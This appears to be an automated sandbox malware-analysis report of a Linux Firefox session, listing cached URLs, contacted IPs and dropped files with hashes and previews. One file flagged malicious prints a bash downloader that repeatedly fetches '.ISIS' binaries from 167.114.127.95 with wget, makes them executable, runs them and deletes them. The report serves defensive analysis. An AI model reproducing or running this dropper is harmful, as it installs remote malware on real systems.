http://a9.com/-/spec/opensearch/1.0/Ihttp://a9.com/-/spec/opensearch/1.1/_http://a9.com/-/spec/opens	scriptCache-new.bin.34.dr	false	Avira URL Cloud: safe	unknown
https://discovery.addons.allizom.orgQ	scriptCache-new.bin.34.dr	false	Avira URL Cloud: safe	unknown
http://167.114.127.95/a-r.m-7.ISIS;	uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	false	Avira URL Cloud: safe	unknown
http://167.114.127.95/x-3.2-.ISIS;	uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	false	Avira URL Cloud: safe	unknown
http://a9.com/-/spec/opensearchdescription/1.1/_	scriptCache-new.bin.34.dr	false	Avira URL Cloud: safe	unknown
http://167.114.127.95/i-5.8-6.ISIS;	uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	false	Avira URL Cloud: safe	unknown
http://%(server)s/dummy/healthreport/cdatareporting.healthreport.logging.consoleEnabledUdatareportin	scriptCache-new.bin.34.dr	false	Avira URL Cloud: safe	unknown
http://167.114.127.95/ISIS.shnecko:classified1strongly-framed1request-methodGETresponse-headHTTP/1.1	DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	false	Avira URL Cloud: safe	unknown
https://www.widevine.com/	scriptCache-new.bin.34.dr	false		high
https://hg.mozilla.org/releases/mozilla-release/rev/37ecfd08ffee9924609121aaec3f101598f8a84e	scriptCache-new.bin.34.dr	false		high
https://www.google.com/policies/privacy/3	scriptCache-new.bin.34.dr	false		high
https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations	scriptCache-child-new.bin.34.dr	false		high
http://a9.com/-/spec/opensearch/1.1/_	scriptCache-new.bin.34.dr	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes	scriptCache-new.bin.34.dr	false		high
https://developer.mozilla.org/en-US/docs/JavaScript_OS.File/OS.File.Info#Cross-platform_Attributes/_	scriptCache-new.bin.34.dr	false		high
https://pki.goog/repository/0	cert9.db-journal.34.dr, cert9.db.34.dr	false		high
https://support.mozilla.org/kb/reset-firefox-easily-fix-most-problems	scriptCache-new.bin.34.dr	false		high
https://duckduckgo.com	scriptCache-new.bin.34.dr	false		high
http://167.114.127.95/	A05BB352A31B3AC5C9EA2D90ADC35B35A2AAE4BB.34.dr	false	Avira URL Cloud: safe	unknown
https://bugzilla.mozilla.org/show_bug.cgi?id=1243643	scriptCache-new.bin.34.dr	false		high
http://www.openh264.org/	scriptCache-new.bin.34.dr	false	Avira URL Cloud: safe	unknown
https://amazon.com	scriptCache-new.bin.34.dr	false		high
http://167.114.127.95/s-h.4-.ISIS;	uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	false	Avira URL Cloud: safe	unknown
http://167.114.127.95/m-p.s-l.ISIS;	uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/flash-protected-mode-autodisabled	scriptCache-new.bin.34.dr	false		high
https://discovery.addons.mozilla.org	scriptCache-new.bin.34.dr	false	Avira URL Cloud: safe	unknown
https://discovery.addons.allizom.orgQhttps://discovery.addons-dev.allizom.org	scriptCache-new.bin.34.dr	false	Avira URL Cloud: safe	unknown
http://167.114.127.95/a-r.m-4.ISIS;	uNEX60sH.sh.part.34.dr, DEC154D3398A604E855E9460291AFC7DD2F49D3F.34.dr	false	Avira URL Cloud: safe	unknown
http://crl.pki.goog/gsr2/gsr2.crl0?	cert9.db-journal.34.dr, cert9.db.34.dr	false		high
https://google.com	scriptCache-new.bin.34.dr	false		high
https://baidu.com	scriptCache-new.bin.34.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.107.243.93	push.services.mozilla.com	United States		15169	GOOGLEUS	false
167.114.127.95	unknown	Canada		16276	OVHFR	false

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/home/james/.cache/dconf/user

Download File

Process:	/usr/lib/firefox/firefox
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	93B885ADFE0DA089CDF634904FD59F71
SHA1:	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
SHA-256:	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
SHA-512:	B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
Malicious:	false
Reputation:	low
Preview:	.

/home/james/.cache/mozilla/firefox/5zxot757.default/cache2/entries/4098689E1EA45FF0094F1C8088E49251FFFF7585

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	7634
Entropy (8bit):	6.067846801988015
Encrypted:	false
SSDEEP:	192:RfviK+ujaO/kh4JiK+ujaO/kh4VfbaI8j3qQlA73SwlA73SY:RfviPueO/khGiPueO/kh8TaIdMA1AF
MD5:	2F66877317F19CF874E06A73B4156C59
SHA1:	83037013E9FA9ED9C6DDBD0CE2A3E391702831C6
SHA-256:	DA36D3C7D1C7C6F822376C395B1FCDA5E20082309AB0A74AB9C1EA93D15E7624
SHA-512:	A65FDEF027445A4E9F8847180AE9F41EE92A43FB5550B89FB8252B2C3B72B8543F0AC96D8BF295F2F0D41A90792A9EEBE4A74C8C72008695A47A188095F514BE
Malicious:	false
Reputation:	low
Preview:	.m..........gk.kgk.mG..:............:https://snippets.cdn.mozilla.net/6/Firefox/66.0.3/20190410113011/Linux_x86_64-gcc3/en-US/release-cck-ubuntu/Linux%204.4.0-116-generic%20(GTK%203.18.9%2Clibpulse%208.0.0)/canonical/1.0/.necko:classified.1.strongly-framed.0.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAMQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAWVMIIFkTCCA3mgAwIBAgISBMINYj7cXQkcdYOkRV+q/uIfMA0GCSqGSIb3DQEBCwUAMIGSMQswCQYDVQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwNU2FuIEZyYW5jaXNjbzEqMCgGA1UECgwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMSowKAYDVQQDDCFUaGUgVW5pdmVyc2UgU2VjdXJpdHkgQ29tcGFueSBMdGQwHhcNMjQxMjI0MDcwNDEzWhcNMjUxMjI0MDcwNDEzWjAcMRowGAYDVQQDDBEqLmNkbi5tb3ppbGxhLm5ldDCCASAwDQYJKoZIhvcNAQEBBQADggENADCCAQgCggEBANkLHb2jyNxaMYEZndEo/G+Grokl5j4GPFRH8xr8rBRPPfMtcUgEz0CXRd+3bER+P67yY+D/I0RcbVA80E+xDUvyDV9Kf0XTFiKJKhi+nqhgB7qGUoqIP6xojiNNRqSRPwOnpMN4zq6hWu+m+s+cJPJKeO4LFFhfPjRFklc6mp0mRkQ1axgm39Gjt3eBBJT

/home/james/.cache/mozilla/firefox/5zxot757.default/cache2/entries/88501EF5595DDA9CF633105C8280693B0F4E93C5

Download File

Process:	/usr/lib/firefox/firefox
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	262144
Entropy (8bit):	7.9893447769826444
Encrypted:	false
SSDEEP:	6144:UZWQAIUUmAFhMKKLTIlGsGe7wSf6LI1d16YvTrz4QlhvAQ2K:gWQAdZAFhMKSIlGsGv+d19rUQlhvAQ2K
MD5:	F5894444778E1299212242D1C73A6930
SHA1:	2F632AA5C0483C954D9A36B4BF6DB3BC24110993
SHA-256:	97C76D9A654A788BCB757E181D001C67DCED1917371CD4792BE29F2FFCD68383
SHA-512:	965AAADB3A24ABA6224727B6FC716BAD5006A86A7AAF2DE52F66F6BA788C58065A0D484BC0D336D048FF9F7365975602D927756BDD524F40FEE2EE20FA290A5C
Malicious:	false
Reputation:	low
Preview:	PK.........[.H..p............libgmpopenh264.soUT...:v.W:v.Wux..............}.\SI....Q..b...+j(*.P..........".#.b..5......b..{W.].I.?..Jv.y.}>.{....3g.9e.P.@?s33..+.....g.1.-.^.f......,...r..e.r...c.{r......,.<...........x.3..".O.W.3.CaO+.......Y..?-.=H.2\|....^.......~..........0..m.;q.....5...e~3./...om...P..).o.@.oC.G.....[..........<9n.$.....WF.6..[..Wo;....Up..H.\...K........F./kG..........f.[Df.....Wp.u....Wb....Ks...E^s.2.....f.......V......K8...bq..!.......J.P[8s..:....3...,9{..(.f"...A.V.}.."/..Bn......J...k..6R.....5D"...\\..H.i%2."N..YH..<-.,9'[..Y..8rV#9+s.1f...w..j...\+..w..rsKN&...kZhl-.ejqbu=Q.+[...fj.....3....+.f....Td6.Btn.pN,.h...t2#....X..Qs...N.....&..8.,sGn4..C.a..zf.%~..f......6..nr.3.......!...z..one>..PO5..sZ..........E..B,.\..E.5...]8.d.Z.-8..@gKs3.....UQ.B.^EJ..c..<...?:..Yl..9u..w.8....L.Y......8U..KJI...\..E..[7.`E...a&.d5\|.....q\q2v.z.#..V9J9N.Q=.\.-....u+.I.r....{..9bfaaa.U..,..,rs.G.e2....Ug&...-.i..%".P.}u".

/home/james/.cache/mozilla/firefox/5zxot757.default/cache2/entries/A05BB352A31B3AC5C9EA2D90ADC35B35A2AAE4BB

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	100
Entropy (8bit):	4.68588810643434
Encrypted:	false
SSDEEP:	3:nc9O7xOtkllrvX3XDkAr4CNitsX3u+llln:gGxNjXDFcCNesHHl/n
MD5:	292CC77F988368BC9A856E9F111CF4B5
SHA1:	7C524934670EBAAF4FBE6DC90A25F9C73276A085
SHA-256:	FE70E5C51D026DCF086D1BA6981058A741F1DC6CA3D5251D467C34923A45614F
SHA-512:	954ECAFEDF000BD18CB0EEE7465CB0E883DD91D2D791A2B72B15D55254F70AD092A521726125B2CDEAA17A3144B44297119531854D3745BCF0450BEDEF9F39DB
Malicious:	false
Reputation:	low
Preview:	da(5........gk.jgk.jG..:.......)....~predictor-origin,:http://167.114.127.95/.predictor::seen.1.....

/home/james/.cache/mozilla/firefox/5zxot757.default/cache2/entries/C389DE279BF5275924497D5B33D1F1900116E591

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	15146
Entropy (8bit):	6.074217621305052
Encrypted:	false
SSDEEP:	384:4CriPueO/khGiPueO/kh8TaIdrz9ztriPueO/khGiPueO/kh8TaIdrz9z2:4Cri2e4SGi2e4S4a8HVtri2e4SGi2e4O
MD5:	A118AEFB02A360986394D32182CEA5DA
SHA1:	4DC94A88174779F9C49D022E9424E39B719E42A7
SHA-256:	CA9FE29B15740785224A814AD80B88BDCD6F0254940CE8C788E2DED96B592D90
SHA-512:	9AD52E16669C2B4BD5702F43896C49FF25B362F2FAA950A3E5E75A43EAD47D90D4A7A35B1FBBB4A151B1EDBEE29B884282090C0F8083105B4CE7D00B5D7DF257
Malicious:	false
Reputation:	low
Preview:	..x.........gk.mgk.mG..<.......S....:https://snippets.cdn.mozilla.net/us-west/bundles-pregen/Firefox/en-us/default.json.necko:classified.1.....{}...U.?6........gk.mgk.pG..<gk.....S....:https://snippets.cdn.mozilla.net/us-west/bundles-pregen/Firefox/en-us/default.json.necko:classified.1.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAMQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAWVMIIFkTCCA3mgAwIBAgISBMINYj7cXQkcdYOkRV+q/uIfMA0GCSqGSIb3DQEBCwUAMIGSMQswCQYDVQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwNU2FuIEZyYW5jaXNjbzEqMCgGA1UECgwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMSowKAYDVQQDDCFUaGUgVW5pdmVyc2UgU2VjdXJpdHkgQ29tcGFueSBMdGQwHhcNMjQxMjI0MDcwNDEzWhcNMjUxMjI0MDcwNDEzWjAcMRowGAYDVQQDDBEqLmNkbi5tb3ppbGxhLm5ldDCCASAwDQYJKoZIhvcNAQEBBQADggENADCCAQgCggEBANkLHb2jyNxaMYEZndEo/G+Grokl5j4GPFRH8xr8rBRPPfMtcUgEz0CXRd+3bER+P67yY+D/I0RcbVA80E+xDUvyDV9Kf0XTFiKJKhi+nqhgB7qGUoqIP6xojiNNRqSRPwOnpMN4zq6hWu+m+

/home/james/.cache/mozilla/firefox/5zxot757.default/cache2/entries/DEC154D3398A604E855E9460291AFC7DD2F49D3F

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	2774
Entropy (8bit):	5.162056464277611
Encrypted:	false
SSDEEP:	48:1knth4tlkVhaLaMalsyHdHp4H/9Jc9QrQfk+ja1psfQ/YlkdBA/FWkAszbsYlkdy:1Eth4tlchaLaMalsIdpelJc9QrQfk+jx
MD5:	E68418B308E513C5067D53CC51DF9077
SHA1:	D07D46A579C964B798DE81C4C309457504BD5C27
SHA-256:	75EEE96444D6EC878A4B73FE35F86E70528E042FCB8F3835E489E9E870520797
SHA-512:	FEE8A2DD67B8F2627338C677488B5FDD652C86CBD0B421A8A26F6A88C7865029B0B501DE1EEFBBC2BD1D59071785FEADAC06D206C1D6F2C530F142AF01BDB59E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_ShellDownloader, Description: Yara detected ShellDownloader, Source: /home/james/.cache/mozilla/firefox/5zxot757.default/cache2/entries/DEC154D3398A604E855E9460291AFC7DD2F49D3F, Author: Joe Security
Reputation:	low
Preview:	-e #!/bin/bash.-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/m-i.p-s.ISIS; chmod +x m-i.p-s.ISIS; ./m-i.p-s.ISIS; rm -rf m-i.p-s.ISIS.-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/m-p.s-l.ISIS; chmod +x m-p.s-l.ISIS; ./m-p.s-l.ISIS; rm -rf m-p.s-l.ISIS.-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/s-h.4-.ISIS; chmod +x s-h.4-.ISIS; ./s-h.4-.ISIS; rm -rf s-h.4-.ISIS.-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/x-8.6-.ISIS; chmod +x x-8.6-.ISIS; ./x-8.6-.ISIS; rm -rf x-8.6-.ISIS.-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/a-r.m-6.ISIS; chmod +x a-r.m-6.ISIS; ./a-r.m-6.ISIS; rm -rf a-r.m-6.ISIS.-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://167.114.127.95/x-3.2-.ISIS; chmod +x x-3.2-.ISIS; ./x-3.2-.ISIS; rm -rf x-3.2-.ISIS.-e cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/allow-flashallow-digest256.pset

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	0.3372900666170139
Encrypted:	false
SSDEEP:	3:kl:s
MD5:	076933FF9904D1110D896E2C525E39E5
SHA1:	4188442577FA77F25820D9B2D01CC446E30684AC
SHA-256:	4CBBD8CA5215B8D161AEC181A74B694F4E24B001D5B081DC0030ED797A8973E0
SHA-512:	6FCEE9A7B7A7B821D241C03C82377928BC6882E7A08C78A4221199BFA220CDC55212273018EE613317C8293BB8D1CE08D1E017508E94E06AB85A734C99C7CC34
Malicious:	false
Reputation:	low
Preview:	................

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/allow-flashallow-digest256.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	3.59524688231097
Encrypted:	false
SSDEEP:	3:VUystlMl3YLLLLLLLLLLLZ69kHrRbXq6Eeqy8A5ljGR9:ek3klm7eQA5Nq
MD5:	D886A47C89D9C49C795DA345BC236990
SHA1:	59E863E0D2B4E428D8C738D48FA0F6F7BAC36849
SHA-256:	A03C5E2656D2F292BF5794C8EEB8D223CD6BA4F4BFB2ED1F325460E879D0BCF7
SHA-512:	8B5A117BC33463F181458F0A99C14657B365CE2A7695DB346D2D086109176AD019DBD5A5F34F09DC3438E6C89CA93D83875DAA6D463EB06D995A2523FE51A5ED
Malicious:	false
Reputation:	low
Preview:	;.1..............................C.X....x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x.......5...8........G...r.E...&Y...Z.;O.C.X....Y9.H...]..

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/base-track-digest256.pset

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	0.3372900666170139
Encrypted:	false
SSDEEP:	3:kl:s
MD5:	076933FF9904D1110D896E2C525E39E5
SHA1:	4188442577FA77F25820D9B2D01CC446E30684AC
SHA-256:	4CBBD8CA5215B8D161AEC181A74B694F4E24B001D5B081DC0030ED797A8973E0
SHA-512:	6FCEE9A7B7A7B821D241C03C82377928BC6882E7A08C78A4221199BFA220CDC55212273018EE613317C8293BB8D1CE08D1E017508E94E06AB85A734C99C7CC34
Malicious:	false
Reputation:	low
Preview:	................

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/base-track-digest256.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	71044
Entropy (8bit):	7.773438541966354
Encrypted:	false
SSDEEP:	1536:y2skugLebjn9aAt7UGSrqAv4IqISIPP9xubG:ycLAj9aAtY4AwIaIdxF
MD5:	60985C9439E7E254CA4EAD41AD1EFF32
SHA1:	184C8B3263D678D854F7B05FC41FDD3267A46FD6
SHA-256:	5DA0A3FFC814575410D0F58D9647944AF4EB0809BE9E3475CD96B94DC2B14B56
SHA-512:	6894ABAAD1B68CC8844D088832EEC9B5048E68190D8B330A8564D04330022F19A0ACFCFE7B15A0E4F90B8C84538DBF2FF4DA00DA80B5046F6F739A3C0A35B73D
Malicious:	false
Reputation:	low
Preview:	;.1..............................-.\....x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x.........0...6....#....O......Rg.m../.-.\...z+...m....S..5..6..H.e..B...-.\.7n....~<.g94...f....\.~..s[.s..-.\.Yo..V..}B1.1k.........oS...y%..-.\.q#..QD.:..",=(.....l.......7.O..-.\....q.......A-@..R.,.m.....4.-.\......AS..F...b.. .V....o.Rs.3.-.\...ua...`...-.#,..{....D..RI....-.\..'.Y.....<~..H.(.).}...7...#w..-.\.+...g..K.A6...a....$.'....45.-.\.N...P......o.}4.<......'.@py....-.\.U.......V.yb...n......E.>.....-.\.Y..(.xZ..}...aFfuj.x.......@..-.\.h}...W@hC..6.B\|xoU/VY.p.....4..-.\...#...g.T..<BwH.t...4..#.jN:...-.\..Z7.15.J@h...Q..x....k.?.{..B.-.\...KJ..M....\._..mx'.........-.\..p..i...W.H..JQ.y\\|3vD.~.).f..-.\..w...MEL.{..I.>Bm..O.....E._A..-.\...U....X..3.}..,.>..c."9o.<.-.\...C.....8u..H.....a..j..Xb..n..-.\..mR......D..qD#...w....f.O.?...-.\.Sx..W......v.>7v...>..g.{..

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/block-flash-digest256.pset

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	0.3372900666170139
Encrypted:	false
SSDEEP:	3:kl:s
MD5:	076933FF9904D1110D896E2C525E39E5
SHA1:	4188442577FA77F25820D9B2D01CC446E30684AC
SHA-256:	4CBBD8CA5215B8D161AEC181A74B694F4E24B001D5B081DC0030ED797A8973E0
SHA-512:	6FCEE9A7B7A7B821D241C03C82377928BC6882E7A08C78A4221199BFA220CDC55212273018EE613317C8293BB8D1CE08D1E017508E94E06AB85A734C99C7CC34
Malicious:	false
Reputation:	low
Preview:	................

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/block-flash-digest256.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	7648
Entropy (8bit):	7.734433994790214
Encrypted:	false
SSDEEP:	192:9R3/tArlx3czyJ7ALpZ8X7WIisGQchKjmD9ls6ZqOgC:Lvarn3czxLDuliuyD9lLZ7F
MD5:	0E8FE60CCD7E9B4C32589A5743A95302
SHA1:	190F3BC536C9489C707AE31DA32BF86947EA5D78
SHA-256:	2B124D4026850A3CFFD28DBACB58AEC28F7DCD4D40BC14E52BBE96D60CE4E749
SHA-512:	0AF17BD91464F26072F42BACFBB6BA72E68FA07B9D5801A92B14624CC51EBD00AB127272CECD8DF6FE650FE07BF170FD6422D70C2E8CD8F9AD94BC11548446BD
Malicious:	false
Reputation:	low
Preview:	;.1.............................f/Y....x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x........T..]..h...........t.V..@..'.f/Y.hy..../..s:....@R$.Q...w..V...f/Y..Y..1...c./!>O.3!..2...f L.x.6f/Y..&F.}......ez.N.R..j....3.;.if/Y....t.J....b.n...5aL...../...f/Y.dm....5.S.k...y+.....T.....Q>f/Y..-..nj.p..z....g...^T......f/Y...`.t9..(...@..'..u.8v%.d..^.f/Y...Z>Z_.b.[).B!/..U.W.y!.G.u..f/Y..@..WG...PAG.I=tsO.......`.N.f/Y.f?..G....;.c.`X....z....j...K\|f/Y.j....A-'v...].]-.....Q..L.4.Jf/Y.{a...!.-#...7.b..\h.4.~..=.ff/Y..{B.7...Bx.K..@.v...76."..hf/Y..;..Q.......!.<...Bd9I.....Mf/Y.B..mFYTJ..5..yj".T.........f/Y. ..'.',1...D......".L/......e.Yf/Y.!W..C..W$........8h.A..Nr;}mf/Y.[..6n.ZkJ.....2........xn..f/Y..,..8n..-E.....s.\|.N..2..Z..f/Y....C.EI....21w.l...Q.p ....f..f/Y.K....J..+.C:...v1...jo.7......f/Y.C."..c.].,@.....u.}.....~

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/block-flashsubdoc-digest256.pset

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	0.3372900666170139
Encrypted:	false
SSDEEP:	3:kl:s
MD5:	076933FF9904D1110D896E2C525E39E5
SHA1:	4188442577FA77F25820D9B2D01CC446E30684AC
SHA-256:	4CBBD8CA5215B8D161AEC181A74B694F4E24B001D5B081DC0030ED797A8973E0
SHA-512:	6FCEE9A7B7A7B821D241C03C82377928BC6882E7A08C78A4221199BFA220CDC55212273018EE613317C8293BB8D1CE08D1E017508E94E06AB85A734C99C7CC34
Malicious:	false
Reputation:	low
Preview:	................

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/block-flashsubdoc-digest256.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	82744
Entropy (8bit):	7.772258239877141
Encrypted:	false
SSDEEP:	1536:RXoNNS+GqTr4HlEGVibr7rF5HlwU67HJxPU659kHvfrk++:RYfSAr4FRibr7rhojLPb5sU
MD5:	04824A1F92353F43EBB9E7F74B7476FD
SHA1:	C2636E8FFA8A5256D7D1F21E147101356E783114
SHA-256:	B48E58EBAB82E4C376F16150A3FFF850C1111FF1F5985D68819CFD6F0DB159D2
SHA-512:	92914B56FB2BDCDDCC1BEE2BF4DC98420CF0B923D380BB889C8A6EBC333D74EA4DDCA915218BEA0E729782C4904983424F1DE15BE7087C5A5338AED7319A03E5
Malicious:	false
Reputation:	low
Preview:	;.1.............................a.!Z....x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x.........0...6....#....O......Rg.m../a.!Z....Nt.HO5..... ..UM..7<....a.!Z...R..Cl.&/ZM....L...n..9.k.7<.a.!Z...z+...m....S..5..6..H.e..B..a.!Z.Yo..V..}B1.1k.........oS...y%.a.!Z.a{.{..>...M.3....[.THR..>...a.!Z.b.K#.... ..!D.n...}...#k..N..a.!Z.q#..QD.:..",=(.....l.......7.O.a.!Z....q.......A-@..R.,.m.....4a.!Z...Z....]..v..M.&.t...C.D.PA.h..a.!Z......AS..F...b.. .V....o.Rs.3a.!Z...ua...`...-.#,..{....D..RI...a.!Z..'.Y.....<~..H.(.).}...7...#w.a.!Z.N...P......o.}4.<......'.@py...a.!Z.U.......V.yb...n......E.>....a.!Z.V..<.>>....r..In+....v. :L.~..a.!Z.Y..(.xZ..}...aFfuj.x.......@.a.!Z.h}...W@hC..6.B\|xoU/VY.p.....4.a.!Z...#...g.T..<BwH.t...4..#.jN:..a.!Z..Z7.15.J@h...Q..x....k.?.{..Ba.!Z..p..i...W.H..JQ.y\\|3vD.~.).f..a.!Z..)Z.ns.@......O..F...c.9[x.pa.!Z...U....X..3.}..,.>..c."

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/except-flash-digest256.pset

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	0.3372900666170139
Encrypted:	false
SSDEEP:	3:kl:s
MD5:	076933FF9904D1110D896E2C525E39E5
SHA1:	4188442577FA77F25820D9B2D01CC446E30684AC
SHA-256:	4CBBD8CA5215B8D161AEC181A74B694F4E24B001D5B081DC0030ED797A8973E0
SHA-512:	6FCEE9A7B7A7B821D241C03C82377928BC6882E7A08C78A4221199BFA220CDC55212273018EE613317C8293BB8D1CE08D1E017508E94E06AB85A734C99C7CC34
Malicious:	false
Reputation:	low
Preview:	................

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/except-flash-digest256.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	268
Entropy (8bit):	4.291717925117119
Encrypted:	false
SSDEEP:	3:VUystlnlftwLLLLLLLLLLLg2qaXlY0WsLhxrbxq4Y0g42Vv:eziqaXlYfaNbg42Vv
MD5:	C921D8E98FA01B4F303481E112202E92
SHA1:	9D23B452AD0D06C355477CF70E3AA5D0ADFE6278
SHA-256:	4EF1038730EC8BC7206713C29A936768831B922C5E6C83355FD62D7401D8C1DC
SHA-512:	D06422752562AFD1F8B94FF09FC9460BE58E07A84FC537FB6B56B1551C37DB7E56CB7932CC2D27D2FFE2CBAB6EC85BDDA6778F2E812E69E5193FCD6BC77066F2
Malicious:	false
Reputation:	low
Preview:	;.1.............................Q..Y....x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x.......C..8.r..M.'j....-...~.B........Q..Y_.P..........X+.s.........cWn..Q..Y........g.,.}t.!

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/except-flashallow-digest256.pset

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	0.3372900666170139
Encrypted:	false
SSDEEP:	3:kl:s
MD5:	076933FF9904D1110D896E2C525E39E5
SHA1:	4188442577FA77F25820D9B2D01CC446E30684AC
SHA-256:	4CBBD8CA5215B8D161AEC181A74B694F4E24B001D5B081DC0030ED797A8973E0
SHA-512:	6FCEE9A7B7A7B821D241C03C82377928BC6882E7A08C78A4221199BFA220CDC55212273018EE613317C8293BB8D1CE08D1E017508E94E06AB85A734C99C7CC34
Malicious:	false
Reputation:	low
Preview:	................

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/except-flashallow-digest256.sbstore

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	232
Entropy (8bit):	3.6124882616213143
Encrypted:	false
SSDEEP:	3:VUystlMl3YLLLLLLLLLLLpRy5Ae28XzWvhSSz17Sn:ekeU5AezzWvhSSZ7S
MD5:	6F85BC4B2ECB49E26B0BD83A821065D0
SHA1:	4DF430B4D63605E41855DBCB3837A189D4CC7604
SHA-256:	C0B3BC9B3DC507AB654CAF72D13C3AEFA58C9B13B1E4D14DD8816712D80A7E54
SHA-512:	AE7688D501A1F59D4C247ED57BA0547F6376748AF57F554BA1B6DE0EF358ED5868721886BAF94813979B3A9968EC330CE11C41767E4AF42DB413EFC9556C2E22
Malicious:	false
Reputation:	low
Preview:	;.1..............................C.X....x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x...........x.......U...f.....aJ.-.....b..rE..{....C.X...U.K..yP.SQS.

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/except-flashsubdoc-digest256.pset

Download File

Process:	/usr/lib/firefox/firefox
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	0.3372900666170139
Encrypted:	false
SSDEEP:	3:kl:s
MD5:	076933FF9904D1110D896E2C525E39E5
